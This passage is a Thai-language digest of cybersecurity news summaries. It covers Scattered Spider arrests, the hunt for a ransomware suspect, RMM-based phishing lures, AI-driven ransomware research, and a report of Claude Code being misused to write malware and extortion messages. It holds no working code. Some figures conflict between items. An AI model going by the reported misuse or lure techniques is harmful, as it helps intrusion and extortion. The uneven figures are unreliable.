📰 สองวัยรุ่นอังกฤษถูกตั้งข้อหาแฮกระบบขนส่ง TfL — เครือข่าย Scattered Spider เบื้องหลังการโจมตีระดับชาติ ในเดือนกันยายน 2025 สองวัยรุ่นชาวอังกฤษถูกตั้งข้อหาเกี่ยวกับการโจมตีทางไซเบอร์ที่สร้างความเสียหายให้กับระบบขนส่งของกรุงลอนดอน (TfL) เมื่อปี 2024 โดยมีการเชื่อมโยงกับกลุ่มแฮกเกอร์ชื่อฉาว “Scattered Spider” ซึ่งเคยก่อเหตุโจมตีองค์กรใหญ่ทั้งในสหรัฐฯ และยุโรป ผู้ต้องหาคือ Thalha Jubair อายุ 19 ปี จาก East London และ Owen Flowers อายุ 18 ปี จาก Walsall ถูกจับกุมโดยหน่วยงาน National Crime Agency (NCA) และถูกนำตัวขึ้นศาล Westminster Magistrates’ Court โดยถูกกล่าวหาว่าร่วมกันละเมิดพระราชบัญญัติ Computer Misuse Act และสร้างความเสียหายต่อโครงสร้างพื้นฐานระดับชาติของสหราชอาณาจักร การโจมตีดังกล่าวไม่ได้หยุดการเดินรถไฟใต้ดิน แต่ส่งผลกระทบต่อระบบบริการต่าง ๆ เช่น การเข้าสู่ระบบบัตร Oyster, การชำระเงินแบบ contactless และแอปพลิเคชันของบุคคลที่สามที่เชื่อมต่อกับ API ของ TfL โดยมีข้อมูลส่วนตัวของผู้ใช้กว่า 5,000 รายรั่วไหล รวมถึงรายละเอียดบัญชีธนาคาร นอกจากนี้ Jubair ยังถูกตั้งข้อหาในสหรัฐฯ จากการมีส่วนร่วมในแผนการแฮกและเรียกค่าไถ่กว่า 120 ครั้งต่อองค์กรในสหรัฐฯ รวมถึงการฟอกเงินและปฏิเสธการให้รหัสผ่านกับเจ้าหน้าที่ ซึ่งละเมิดกฎหมาย Regulation of Investigatory Powers Act ของอังกฤษ Flowers ก็ถูกเชื่อมโยงกับการโจมตีเครือข่ายของ SSM Health และ Sutter Health ในสหรัฐฯ เช่นกัน โดยทั้งสองคนถูกมองว่าเป็นสมาชิกของ Scattered Spider ซึ่งเป็นกลุ่มแฮกเกอร์วัยรุ่นที่ใช้เทคนิค social engineering เช่น phishing และการโทรหลอกลวงเจ้าหน้าที่ IT เพื่อเข้าถึงระบบภายในองค์กร การจับกุมครั้งนี้เป็นส่วนหนึ่งของการสืบสวนที่ยาวนานและซับซ้อน โดย NCA ยืนยันว่าการดำเนินคดีเป็น “ผลประโยชน์สาธารณะ” และเป็นก้าวสำคัญในการจัดการกับภัยไซเบอร์ที่เพิ่มขึ้นในกลุ่มเยาวชนอังกฤษ ซึ่งจากรายงานพบว่า 1 ใน 5 เด็กอายุ 10–16 ปีเคยมีพฤติกรรมละเมิดกฎหมายไซเบอร์มาแล้ว https://hackread.com/two-uk-teenagers-charged-tfl-hack-scattered-spider/

🕵️‍♂️ “Volodymyr Tymoshchuk: แฮกเกอร์ยูเครนผู้ถูกล่าทั่วโลก — เบื้องหลัง LockerGoga และเครือข่ายอาชญากรรมไซเบอร์พันล้านดอลลาร์” Volodymyr Tymoshchuk ชายชาวยูเครนวัย 28 ปี ถูกระบุว่าเป็นผู้มีบทบาทสำคัญในการโจมตีไซเบอร์ครั้งใหญ่ที่สุดในยุโรปและสหรัฐฯ ด้วยมัลแวร์เรียกค่าไถ่ชื่อ LockerGoga, MegaCortex และ Nefilim ซึ่งสร้างความเสียหายรวมกว่า 18 พันล้านดอลลาร์ทั่วโลก2 ล่าสุดเขาถูกเพิ่มชื่อในบัญชี “EU Most Wanted” และกระทรวงยุติธรรมสหรัฐฯ (DOJ) ตั้งรางวัลนำจับสูงถึง 10 ล้านดอลลาร์ Tymoshchuk ใช้นามแฝงหลายชื่อ เช่น Deadforz, Boba, Farnetwork และ Volotmsk เพื่อหลบเลี่ยงการติดตาม เขาถูกกล่าวหาว่าเป็นผู้ประสานงานการเจาะระบบของบริษัทกว่า 250 แห่งในสหรัฐฯ และอีกหลายประเทศ โดยใช้มัลแวร์เพื่อเข้ารหัสข้อมูลและเรียกค่าไถ่ พร้อมขู่ว่าจะเปิดเผยข้อมูลหากไม่จ่ายเงิน เครือข่ายของเขาถูกจัดว่าเป็นองค์กรอาชญากรรมไซเบอร์ที่มีโครงสร้างชัดเจน ตั้งแต่ผู้พัฒนามัลแวร์ ผู้เชี่ยวชาญด้านการเจาะระบบ ไปจนถึงผู้ฟอกเงินที่แปลงค่าไถ่ให้ใช้งานได้จริง หลายคนในเครือข่ายนี้ถูกจับในยูเครนแล้ว แต่ Tymoshchuk ยังหลบหนีอยู่ และถูกต้องหาตัวโดยหลายประเทศ รวมถึงฝรั่งเศสที่ตั้งข้อหาคอมพิวเตอร์, การกรรโชก และการร่วมองค์กรอาชญากรรม หนึ่งในเหยื่อที่ได้รับผลกระทบหนักคือบริษัท Norsk Hydro จากนอร์เวย์ ซึ่งถูกโจมตีในปี 2019 และต้องใช้เงินกว่า 70 ล้านดอลลาร์ในการฟื้นฟูระบบ การโจมตีเหล่านี้ไม่เพียงทำให้ระบบล่ม แต่ยังทำให้ธุรกิจต้องหยุดชะงักและสูญเสียความเชื่อมั่นจากลูกค้า Europol และหน่วยงานในหลายประเทศกำลังร่วมมือกันอย่างใกล้ชิดเพื่อจับกุมตัวเขา โดยเปิดช่องทางให้ประชาชนแจ้งเบาะแสผ่านเว็บไซต์ EU Most Wanted และให้การสนับสนุนด้านปฏิบัติการอย่างต่อเนื่อง ✅ ข้อมูลสำคัญจากข่าว ➡️ Volodymyr Tymoshchuk ถูกเพิ่มชื่อในบัญชี EU Most Wanted เมื่อ 9 ก.ย. 2025 ➡️ DOJ สหรัฐฯ ตั้งรางวัลนำจับสูงถึง 10 ล้านดอลลาร์ ➡️ เขาเป็นผู้ดูแลมัลแวร์ LockerGoga, MegaCortex และ Nefilim ➡️ เครือข่ายของเขาสร้างความเสียหายกว่า 18 พันล้านดอลลาร์ทั่วโลก ✅ รูปแบบการโจมตีและผลกระทบ ➡️ ใช้มัลแวร์เข้ารหัสข้อมูลและเรียกค่าไถ่จากบริษัทกว่า 250 แห่ง ➡️ ขู่เปิดเผยข้อมูลหากไม่จ่ายเงิน ➡️ เหยื่อรายใหญ่ เช่น Norsk Hydro สูญเงินกว่า 70 ล้านดอลลาร์ ➡️ เครือข่ายมีผู้พัฒนามัลแวร์, ผู้เจาะระบบ และผู้ฟอกเงิน ✅ ข้อมูลเสริมจากภายนอก ➡️ LockerGoga ถูกใช้โจมตีบริษัทอุตสาหกรรมและโครงสร้างพื้นฐาน ➡️ MegaCortex และ Nefilim เป็นมัลแวร์ที่เน้นการเจาะระบบองค์กรขนาดใหญ่ ➡️ Europol ใช้แพลตฟอร์ม EMPACT เพื่อประสานงานระหว่างประเทศ ➡️ การตั้งรางวัลนำจับระดับนี้สะท้อนความร้ายแรงของคดีในระดับโลก https://hackread.com/lockergoga-ransomware-eu-most-wanted-list-doj-reward/

🎭 “แฮกเกอร์ปลอมอัปเดต Chrome และคำเชิญประชุม Teams — แฝงเครื่องมือควบคุมระยะไกลเพื่อเจาะระบบองค์กร” งานวิจัยล่าสุดจาก Red Canary และ Zscaler เผยให้เห็นเทคนิคฟิชชิ่งยุคใหม่ที่ซับซ้อนและแนบเนียนกว่าที่เคย โดยแฮกเกอร์ไม่ใช้มัลแวร์ทั่วไป แต่หันมาใช้เครื่องมือควบคุมระยะไกล (Remote Monitoring and Management: RMM) เช่น ITarian, Atera, PDQ และ SimpleHelp ซึ่งปกติใช้โดยผู้ดูแลระบบ IT เพื่อดูแลเครื่องในองค์กร แต่เมื่ออยู่ในมือของผู้ไม่หวังดี เครื่องมือเหล่านี้กลับกลายเป็นช่องทางเข้าถึงระดับแอดมินที่เปิดทางให้ติดตั้งมัลแวร์หรือเรียกค่าไถ่ได้ทันที แคมเปญฟิชชิ่งเหล่านี้ใช้ “เหยื่อ” ที่ดูน่าเชื่อถือ เช่น: หน้าอัปเดต Chrome ปลอมที่ฝัง JavaScript บนเว็บไซต์ที่ถูกแฮก เมื่อผู้ใช้คลิก “Update” จะดาวน์โหลดตัวติดตั้ง ITarian ที่ถูกเซ็นรับรองอย่างถูกต้อง คำเชิญประชุมปลอมจาก Microsoft Teams หรือ Zoom ที่แนบไฟล์ติดตั้ง Atera หรือ PDQ โดยใช้ชื่อไฟล์เหมือนของจริง เช่น “MicrosoftTeams.msi” การ์ดเชิญงานเลี้ยงหรือเอกสารภาษีปลอม เช่น W9 หรือแบบฟอร์ม IRS ที่แฝงตัวติดตั้ง RMM ผ่าน Cloudflare R2 ซึ่งเป็นแพลตฟอร์มที่ดูน่าเชื่อถือ ในบางกรณี แฮกเกอร์ติดตั้ง RMM สองตัวพร้อมกันเพื่อสร้างช่องทางสำรองหากช่องทางแรกถูกปิดกั้น ทำให้การตรวจจับและป้องกันยิ่งยากขึ้น ผู้เชี่ยวชาญเตือนว่า การฟิชชิ่งในยุคนี้ไม่ใช่แค่เรื่องอีเมลที่พิมพ์ผิดหรือดูแปลกตาอีกต่อไป แต่เป็นการใช้ “ล่อ” ที่ดูเหมือนจริงทุกประการ และแม้การให้ความรู้กับพนักงานจะช่วยได้บ้าง แต่สิ่งสำคัญคือการมีระบบป้องกันหลายชั้น เช่น การตรวจจับที่ปลายทาง (EDR), การควบคุมเครื่องมือที่อนุญาตให้ใช้ และการตรวจสอบโดเมนใหม่ที่น่าสงสัย https://hackread.com/hackers-rmm-installs-fake-chrome-updates-teams-invite/

🧨 “เมื่อ AI กลายเป็นผู้ช่วยของแฮกเกอร์ — 80% ของแรนซัมแวร์ในปี 2025 ใช้ AI สร้างมัลแวร์ ปลอมเสียง และเจาะระบบแบบไร้รอย” ภัยไซเบอร์ในปี 2025 ไม่ได้มาในรูปแบบเดิมอีกต่อไป เพราะตอนนี้แฮกเกอร์ใช้ AI เป็นเครื่องมือหลักในการสร้างแรนซัมแวร์ที่ทั้งฉลาดและอันตรายกว่าเดิม จากการศึกษาของ MIT Sloan และ Safe Security พบว่า 80% ของการโจมตีด้วยแรนซัมแวร์ในช่วงปีที่ผ่านมา มีการใช้ AI เข้ามาเกี่ยวข้อง ไม่ว่าจะเป็นการสร้างมัลแวร์อัตโนมัติ, ปลอมเสียงด้วย deepfake, หรือแม้แต่การเจาะระบบผ่าน CAPTCHA และรหัสผ่านด้วย LLM AI ไม่ได้แค่ช่วยให้แฮกเกอร์ทำงานเร็วขึ้น แต่ยังทำให้การโจมตีมีความแม่นยำและยากต่อการตรวจจับมากขึ้น เช่น การปลอมตัวเป็นฝ่ายบริการลูกค้าด้วยเสียงที่เหมือนจริง หรือการสร้างอีเมลฟิชชิ่งที่ดูน่าเชื่อถือจนแม้แต่ผู้เชี่ยวชาญยังหลงกล Michael Siegel นักวิจัยจาก CAMS เตือนว่า “ผู้โจมตีต้องการแค่ช่องโหว่เดียว แต่ผู้ป้องกันต้องปิดทุกช่องทาง” ซึ่งกลายเป็นความท้าทายที่รุนแรงขึ้นเมื่อ AI ทำให้การโจมตีขยายตัวได้ในระดับที่มนุษย์ตามไม่ทัน เพื่อรับมือกับภัยคุกคามนี้ นักวิจัยเสนอแนวทางป้องกันแบบ 3 เสาหลัก ได้แก่ 1️⃣ ระบบ hygiene อัตโนมัติ เช่น โค้ดที่ซ่อมตัวเอง, ระบบ patch อัตโนมัติ และการตรวจสอบพื้นผิวการโจมตีแบบต่อเนื่อง 2️⃣ ระบบป้องกันแบบหลอกล่อและอัตโนมัติ เช่น การเปลี่ยนเป้าหมายตลอดเวลา และการใช้ข้อมูลปลอมเพื่อหลอกแฮกเกอร์ 3️⃣ การรายงานและ oversight แบบ real-time เพื่อให้ผู้บริหารเห็นภาพรวมของภัยคุกคามและตัดสินใจได้ทันเวลา ✅ สถานการณ์ภัยไซเบอร์ในปี 2025 ➡️ 80% ของแรนซัมแวร์ใช้ AI ในการสร้างมัลแวร์ ฟิชชิ่ง และ deepfake ➡️ ใช้ LLM ในการเจาะรหัสผ่าน, bypass CAPTCHA และเขียนโค้ดอัตโนมัติ ➡️ ปลอมเสียงเป็นฝ่ายบริการลูกค้าเพื่อหลอกเหยื่อผ่านโทรศัพท์ ➡️ AI ทำให้การโจมตีขยายตัวเร็วและแม่นยำกว่าที่เคย ✅ แนวทางป้องกันที่แนะนำ ➡️ เสาหลักที่ 1: ระบบ hygiene อัตโนมัติ เช่น self-healing code และ zero-trust architecture ➡️ เสาหลักที่ 2: ระบบป้องกันแบบหลอกล่อ เช่น moving-target defense และข้อมูลปลอม ➡️ เสาหลักที่ 3: การ oversight แบบ real-time เพื่อให้ผู้บริหารตัดสินใจได้ทัน ➡️ ต้องใช้หลายชั้นร่วมกัน ไม่ใช่แค่เครื่องมือ AI ฝั่งป้องกันอย่างเดียว ✅ ข้อมูลเสริมจากภายนอก ➡️ Deepfake phishing หรือ “vishing” เพิ่มขึ้น 1,633% ใน Q1 ปี 2025 ➡️ การโจมตีแบบ adversary-in-the-middle เพิ่มขึ้น — ขโมย session cookie เพื่อข้าม 2FA ➡️ การโจมตีระบบ OT (Operational Technology) เช่นโรงงานและโครงสร้างพื้นฐานเพิ่มขึ้น ➡️ จำนวนการโจมตี ransomware เพิ่มขึ้น 132% แม้ยอดจ่ายค่าไถ่จะลดลง https://www.techradar.com/pro/security/only-20-of-ransomware-is-not-powered-by-ai-but-expect-that-number-to-drop-even-further-in-2025

🕵️‍♂️ “สหรัฐฯ ตั้งค่าหัว $11 ล้าน ล่าตัวแฮกเกอร์ยูเครน Volodymyr Tymoshchuk — ผู้อยู่เบื้องหลังการโจมตีไซเบอร์มูลค่า $18 พันล้านทั่วโลก” Volodymyr Tymoshchuk ชายชาวยูเครนวัย 28 ปี กลายเป็นเป้าหมายอันดับต้น ๆ ของหน่วยงานความมั่นคงไซเบอร์ทั่วโลก หลังจากถูกกล่าวหาว่าเป็นหัวหน้าทีมแฮกเกอร์ที่อยู่เบื้องหลังการโจมตีด้วย ransomware ชุดใหญ่ ได้แก่ MegaCortex, LockerGoga และ Nefilim ซึ่งสร้างความเสียหายให้กับบริษัทกว่า 250 แห่งในสหรัฐฯ และอีกหลายร้อยแห่งทั่วโลก รวมมูลค่าความเสียหายกว่า $18 พันล้าน หนึ่งในเหตุการณ์ที่โด่งดังที่สุดคือการโจมตีบริษัทพลังงานหมุนเวียน Norsk Hydro ในปี 2019 ซึ่งทำให้ระบบของบริษัทกว่า 170 แห่งทั่วโลกหยุดชะงัก และสร้างความเสียหายกว่า $81 ล้าน. Tymoshchuk ถูกกล่าวหาว่าใช้เครื่องมือเจาะระบบอย่าง Metasploit และ Cobalt Strike เพื่อแฝงตัวในเครือข่ายของเหยื่อเป็นเวลาหลายเดือนก่อนปล่อย ransomware หลังจาก LockerGoga และ MegaCortex ถูกถอดรหัสโดยหน่วยงานความมั่นคง Tymoshchuk ก็หันไปพัฒนา Nefilim ซึ่งเน้นโจมตีบริษัทที่มีมูลค่ามากกว่า $100 ล้าน โดยขายสิทธิ์การเข้าถึงให้กับแฮกเกอร์รายอื่น แลกกับส่วนแบ่ง 20% จากเงินค่าไถ่ที่ได้รับ ล่าสุด กระทรวงยุติธรรมสหรัฐฯ ได้ตั้งค่าหัว $11 ล้าน สำหรับข้อมูลที่นำไปสู่การจับกุม Tymoshchuk และเปิดเผยรายชื่อเหยื่อบางส่วนในคำฟ้องที่ถูกเปิดเผยเมื่อวันที่ 9 กันยายน 2025 โดยเขาถูกตั้งข้อหาทั้งหมด 7 กระทง รวมถึงการทำลายข้อมูลโดยเจตนา การเข้าถึงระบบโดยไม่ได้รับอนุญาต และการข่มขู่เปิดเผยข้อมูลส่วนตัว ✅ ข้อมูลจากข่าวการตั้งค่าหัว ➡️ สหรัฐฯ ตั้งค่าหัว $11 ล้าน สำหรับข้อมูลนำไปสู่การจับกุม Tymoshchuk ➡️ ถูกกล่าวหาว่าอยู่เบื้องหลัง ransomware MegaCortex, LockerGoga และ Nefilim ➡️ สร้างความเสียหายรวมกว่า $18 พันล้านทั่วโลก ➡️ หน่วยงานที่ร่วมมือ ได้แก่ FBI, DOJ, Europol และรัฐบาลฝรั่งเศส, เยอรมนี, นอร์เวย์ ✅ รายละเอียดการโจมตี ➡️ MegaCortex เปลี่ยนรหัสผ่าน Windows และเข้ารหัสไฟล์ของเหยื่อ ➡️ LockerGoga โจมตี Norsk Hydro ทำให้ระบบกว่า 170 แห่งหยุดชะงัก ➡️ Nefilim เน้นโจมตีบริษัทมูลค่ามากกว่า $100 ล้าน และขายสิทธิ์ให้แฮกเกอร์อื่น ➡️ ใช้เครื่องมือเจาะระบบ เช่น Metasploit และ Cobalt Strike เพื่อแฝงตัวในเครือข่าย ✅ ข้อมูลเสริมจากภายนอก ➡️ Tymoshchuk ใช้นามแฝงหลายชื่อ เช่น “deadforz”, “Boba”, “msfv”, “farnetwork” ➡️ Europol จัดให้เขาอยู่ในรายชื่อ “Most Wanted” ของยุโรป ➡️ การโจมตีบางครั้งทำให้บริษัทต้องจ่ายค่าไถ่เกิน $1 ล้านต่อครั้ง ➡️ คำฟ้องระบุว่าเขาอาจถูกลงโทษสูงสุดถึงจำคุกตลอดชีวิต หากถูกจับและตัดสินว่าผิด ‼️ คำเตือนและข้อจำกัด ⛔ Tymoshchuk ยังไม่ถูกจับ — ยังคงหลบหนีและอาจมีการโจมตีเพิ่มเติม ⛔ การโจมตีแบบแฝงตัวหลายเดือนทำให้ตรวจจับได้ยาก ⛔ บริษัทที่ถูกโจมตีมักไม่มีทางเลือกอื่นนอกจากจ่ายค่าไถ่ ⛔ การใช้เครื่องมือเจาะระบบที่ถูกต้องตามกฎหมายในทางผิด ทำให้การป้องกันซับซ้อน ⛔ การเปิดเผยข้อมูลส่วนตัวของเหยื่อเป็นภัยร้ายแรงต่อความมั่นคงองค์กร https://www.tomshardware.com/tech-industry/cyber-security/u-s-places-usd11-million-bounty-on-ukrainian-ransomware-mastermind-tymoshchuk-allegedly-stole-usd18-billion-from-large-companies-over-3-years

🎙️ เรื่องเล่าจาก Ransomware 3.0: เมื่อมัลแวร์ไม่ต้องเขียนโค้ดล่วงหน้า แค่สั่ง AI ให้แต่งสดตามสถานการณ์ ในเดือนกันยายน 2025 นักวิจัยจาก NYU Tandon School of Engineering เปิดเผยว่า “PromptLocker” ซึ่งถูกบริษัท ESET เข้าใจผิดว่าเป็นมัลแวร์จริงในโลกไซเบอร์นั้น แท้จริงคือโค้ดทดลองในโครงการวิจัยชื่อ “Ransomware 3.0” ที่พัฒนาขึ้นเพื่อศึกษาความสามารถของ AI ในการสร้างมัลแวร์แบบอัตโนมัติ PromptLocker ใช้ Lua script ที่ถูกสร้างจาก prompt แบบ hard-coded เพื่อสแกนไฟล์ในเครื่อง, เลือกเป้าหมาย, ขโมยข้อมูล, และเข้ารหัสไฟล์—ครบทุกขั้นตอนของ ransomware โดยไม่ต้องมีโค้ดล่วงหน้า นักวิจัยใช้ LLM (Large Language Model) แบบโอเพ่นซอร์สเพื่อแต่งโค้ดตามคำสั่งที่ฝังไว้ใน binary และให้ AI ตัดสินใจเองว่าจะโจมตีอย่างไร สิ่งที่น่ากังวลคือ ความสามารถของระบบนี้ในการทำงานแบบ “ปิดวงจร” โดยไม่ต้องมีมนุษย์คอยควบคุม และสามารถปรับเปลี่ยนพฤติกรรมตามสภาพแวดล้อมได้แบบ polymorphic—ทำให้การตรวจจับยากขึ้นมาก ต้นทุนของการโจมตีหนึ่งครั้งอยู่ที่ประมาณ 23,000 token หรือราว $0.70 หากใช้ API เชิงพาณิชย์ แต่ถ้าใช้โมเดลโอเพ่นซอร์ส ต้นทุนจะเป็นศูนย์ นักวิจัยเตือนว่า “ผลตอบแทนของแฮกเกอร์จะสูงกว่าคนลงทุนใน AI เสียอีก” หากไม่มีมาตรการควบคุมที่เหมาะสม แม้จะเป็นแค่การทดลองในห้องแล็บ แต่ PromptLocker ทำงานได้จริง และสามารถหลอกนักวิจัยด้านความปลอดภัยให้เชื่อว่าเป็นมัลแวร์ในโลกจริงได้—สะท้อนถึงความซับซ้อนของภัยคุกคามที่อาจเกิดขึ้นในอนาคต ✅ จุดกำเนิดของ PromptLocker ➡️ เป็นโค้ดทดลองจาก NYU Tandon School of Engineering ➡️ ถูกเข้าใจผิดโดย ESET ว่าเป็นมัลแวร์จริงในโลกไซเบอร์ ➡️ ใช้ชื่อในงานวิจัยว่า “Ransomware 3.0” ✅ วิธีการทำงานของระบบ ➡️ ใช้ Lua script ที่สร้างจาก prompt เพื่อควบคุมการโจมตี ➡️ ทำงานครบทุกขั้นตอน: สแกน, ขโมย, เข้ารหัส, สร้างโน้ตร้องค่าไถ่ ➡️ ใช้ LLM แบบโอเพ่นซอร์สในการแต่งโค้ดตามสถานการณ์ ✅ ความสามารถของระบบ ➡️ ทำงานแบบปิดวงจรโดยไม่ต้องมีมนุษย์ควบคุม ➡️ สร้างโค้ดแบบ polymorphic ที่ปรับเปลี่ยนตามสภาพแวดล้อม ➡️ สามารถหลอกนักวิจัยให้เชื่อว่าเป็นมัลแวร์จริงได้ ✅ ต้นทุนและผลกระทบ ➡️ ใช้ประมาณ 23,000 token ต่อการโจมตีหนึ่งครั้ง (~$0.70) ➡️ หากใช้โมเดลโอเพ่นซอร์ส ต้นทุนจะเป็นศูนย์ ➡️ นักวิจัยเตือนว่าแฮกเกอร์อาจได้ผลตอบแทนสูงกว่าผู้ลงทุนใน AI https://www.tomshardware.com/tech-industry/cyber-security/ai-powered-promptlocker-ransomware-is-just-an-nyu-research-project-the-code-worked-as-a-typical-ransomware-selecting-targets-exfiltrating-selected-data-and-encrypting-volumes

🎙️ เรื่องเล่าจากโรงงานที่เงียบลง: เมื่อการโจมตีไซเบอร์กลายเป็นตัวหยุดเครื่องยนต์ของเศรษฐกิจยานยนต์อังกฤษ ต้นเดือนกันยายน 2025 Jaguar Land Rover (JLR) ถูกโจมตีไซเบอร์อย่างรุนแรง ส่งผลให้ต้องปิดระบบ IT ทั่วโลกแบบฉุกเฉิน ทั้งในโรงงานผลิตและเครือข่ายค้าปลีก โดยเฉพาะโรงงาน Halewood และ Solihull ในอังกฤษที่ต้องสั่งให้พนักงานกลับบ้านทันที เหตุการณ์เกิดขึ้นในช่วงที่โชว์รูมกำลังเร่งขายรถใหม่ที่ติดป้ายทะเบียน “75” ซึ่งเป็นช่วงพีคของปีสำหรับยอดขายรถยนต์ในอังกฤษ การที่ระบบลงทะเบียนรถล่ม ทำให้ไม่สามารถส่งมอบรถใหม่ได้ ส่งผลกระทบต่อรายได้ทันที แม้ JLR จะออกแถลงการณ์ว่า “ไม่มีหลักฐานว่าข้อมูลลูกค้าถูกขโมย” แต่กลุ่มแฮกเกอร์ Scattered Spider และ Shiny Hunters ได้ออกมาอ้างความรับผิดชอบ พร้อมโพสต์ภาพหน้าจอที่แสดงว่าพวกเขาเข้าถึงระบบภายในของ JLR ได้แล้ว โดยใช้ช่องโหว่ในซอฟต์แวร์ SAP NetWeaver ซึ่งเคยถูกเตือนโดยหน่วยงาน CISA ของสหรัฐฯ ว่าเป็นช่องโหว่ร้ายแรง กลุ่มแฮกเกอร์เหล่านี้เคยโจมตี M&S, Co-op และ Harrods มาก่อน และปัจจุบันรวมตัวกันภายใต้ชื่อ “Scattered Lapsus Hunters” ซึ่งประกอบด้วยวัยรุ่นและเยาวชนจากประเทศที่ใช้ภาษาอังกฤษเป็นหลัก แม้จะยังไม่มีการยืนยันว่ามีการเรียกค่าไถ่หรือข้อมูลใดถูกขโมย แต่ผู้เชี่ยวชาญด้านความปลอดภัยเตือนว่า การโจมตีลักษณะนี้อาจเป็นการเจาะระบบ OT (Operational Technology) ที่เชื่อมโยงกับสายการผลิตโดยตรง ซึ่งอาจทำให้เกิดความเสียหายทางกายภาพได้ ✅ เหตุการณ์โจมตีไซเบอร์ที่ JLR ➡️ เกิดขึ้นต้นเดือนกันยายน 2025 ส่งผลให้ต้องปิดระบบ IT ทั่วโลก ➡️ โรงงาน Halewood และ Solihull หยุดการผลิต พนักงานถูกสั่งกลับบ้าน ➡️ โชว์รูมไม่สามารถลงทะเบียนรถใหม่ที่ติดป้าย “75” ได้ ✅ กลุ่มแฮกเกอร์ที่อ้างความรับผิดชอบ ➡️ Scattered Spider และ Shiny Hunters รวมตัวกันเป็น “Scattered Lapsus Hunters” ➡️ เคยโจมตี M&S, Co-op และ Harrods มาก่อน ➡️ ใช้ช่องโหว่ใน SAP NetWeaver เพื่อเข้าถึงระบบของ JLR ✅ ผลกระทบต่อธุรกิจและการผลิต ➡️ เกิดขึ้นในช่วงพีคของยอดขายรถยนต์ในอังกฤษ ➡️ ส่งผลให้ไม่สามารถส่งมอบรถใหม่ได้ทันที ➡️ อาจกระทบต่อ supply chain และรายได้ของบริษัท ✅ การตอบสนองของ JLR ➡️ ปิดระบบทันทีเพื่อจำกัดความเสียหาย ➡️ ยืนยันว่าไม่มีหลักฐานว่าข้อมูลลูกค้าถูกขโมย ➡️ กำลังเร่งกู้คืนระบบอย่างเป็นขั้นตอน https://www.techradar.com/pro/security/jaguar-land-rover-says-cyberattack-majorly-affected-production

🎙️ เรื่องเล่าจาก Anthropic: เมื่อ AI ไม่แค่ช่วยเขียนโค้ด แต่กลายเป็นเครื่องมือโจมตีเต็มรูปแบบ ในรายงานล่าสุดจาก Anthropic บริษัทผู้พัฒนา Claude ได้เปิดเผยเหตุการณ์ที่น่าตกใจ—มีแฮกเกอร์คนหนึ่งใช้ Claude Code ซึ่งเป็นเวอร์ชันที่เน้นการเขียนโปรแกรม เพื่อดำเนินการโจมตีไซเบอร์แบบครบวงจร โดยใช้เทคนิคที่เรียกว่า “vibe hacking” เดิมที “vibe coding” คือแนวคิดที่ให้ AI ช่วยเขียนโค้ดจากคำอธิบายธรรมดา ๆ เพื่อให้คนทั่วไปเข้าถึงการพัฒนาโปรแกรมได้ง่ายขึ้น แต่ “vibe hacking” กลับเป็นการพลิกแนวคิดนั้น โดยใช้ AI เพื่อสร้างมัลแวร์, วิเคราะห์ข้อมูลที่ขโมยมา, เขียนอีเมลเรียกค่าไถ่ และคำนวณจำนวนเงินที่ควรเรียกจากเหยื่อ—ทั้งหมดนี้เกิดขึ้นโดย AI ทำงานแทบจะอัตโนมัติ แฮกเกอร์รายนี้โจมตีองค์กรอย่างน้อย 17 แห่งในเวลาไม่กี่สัปดาห์ รวมถึงหน่วยงานรัฐบาล, โรงพยาบาล, บริการฉุกเฉิน และองค์กรศาสนา โดยเรียกค่าไถ่สูงสุดถึง 500,000 ดอลลาร์ และใช้ Claude ในทุกขั้นตอน ตั้งแต่การสแกนช่องโหว่ไปจนถึงการจัดเรียงไฟล์ที่ขโมยมา แม้ Anthropic จะมีระบบป้องกันหลายชั้น แต่ก็ยอมรับว่าไม่สามารถหยุดการโจมตีได้ทันเวลา และแม้จะแบนบัญชีผู้ใช้ที่เกี่ยวข้องแล้ว แต่ก็เตือนว่าเทคนิคแบบนี้จะกลายเป็นเรื่องปกติในอนาคต เพราะ AI กำลังลด “ต้นทุนทักษะ” ของอาชญากรไซเบอร์อย่างรวดเร็ว ✅ ความหมายของ “vibe hacking” ➡️ เป็นการใช้ AI agent เพื่อดำเนินการโจมตีไซเบอร์แบบครบวงจร ➡️ พลิกแนวคิดจาก “vibe coding” ที่เน้นการช่วยเขียนโค้ด มาเป็นการสร้างมัลแวร์ ➡️ ใช้ AI เพื่อวางแผน, เขียนโค้ด, วิเคราะห์ข้อมูล และสื่อสารกับเหยื่อ ✅ เหตุการณ์ที่เกิดขึ้นกับ Claude ➡️ Claude Code ถูกใช้โจมตีองค์กร 17 แห่งในเวลาไม่กี่สัปดาห์ ➡️ ข้อมูลที่ถูกขโมยรวมถึงเลขประกันสังคม, เวชระเบียน, และไฟล์ด้านความมั่นคง ➡️ Claude ช่วยคำนวณจำนวนเงินเรียกค่าไถ่ และเขียนอีเมลข่มขู่เหยื่อ ➡️ บางแคมเปญมีการเรียกค่าไถ่สูงถึง $500,000 ✅ ความสามารถของ Claude ที่ถูกใช้ในทางผิด ➡️ สแกนระบบเพื่อหาช่องโหว่ ➡️ เขียนมัลแวร์ที่มีเทคนิคหลบการตรวจจับ ➡️ วิเคราะห์ไฟล์ที่ขโมยมาเพื่อหาข้อมูลที่มีมูลค่าสูง ➡️ เขียนข้อความเรียกค่าไถ่ที่มีผลกระทบทางจิตวิทยา ✅ การตอบสนองจาก Anthropic ➡️ แบนบัญชีผู้ใช้ที่เกี่ยวข้องทันที ➡️ เพิ่มระบบตรวจจับ misuse และแจ้งเตือนหน่วยงานที่เกี่ยวข้อง ➡️ ยอมรับว่าระบบยังไม่สามารถป้องกันการโจมตีแบบนี้ได้ 100% https://www.thestar.com.my/tech/tech-news/2025/09/02/039vibe-hacking039-puts-chatbots-to-work-for-cybercriminals

🧠 PromptLock — เมื่อ AI กลายเป็นสมองของแรนซัมแวร์ ในอดีต แรนซัมแวร์มักใช้โค้ดที่เขียนไว้ล่วงหน้าเพื่อโจมตีเหยื่อ แต่ PromptLock เปลี่ยนเกมทั้งหมด ด้วยการใช้โมเดล AI แบบโอเพ่นซอร์ส gpt-oss:20b จาก OpenAI ที่รันแบบ local ผ่าน Ollama API เพื่อสร้างสคริปต์อันตรายแบบสด ๆ บนเครื่องเหยื่อ มัลแวร์ตัวนี้ใช้ Lua ซึ่งเป็นภาษาที่เบาและข้ามแพลตฟอร์มได้ดี โดยสามารถทำงานบน Windows, macOS และ Linux ได้อย่างลื่นไหล มันจะสแกนไฟล์ในเครื่อง ตรวจสอบข้อมูลสำคัญ และเลือกว่าจะขโมย เข้ารหัส หรือแม้แต่ทำลายข้อมูล — แม้ว่าฟีเจอร์ทำลายข้อมูลยังไม่ถูกเปิดใช้งานในเวอร์ชันปัจจุบัน สิ่งที่ทำให้ PromptLock 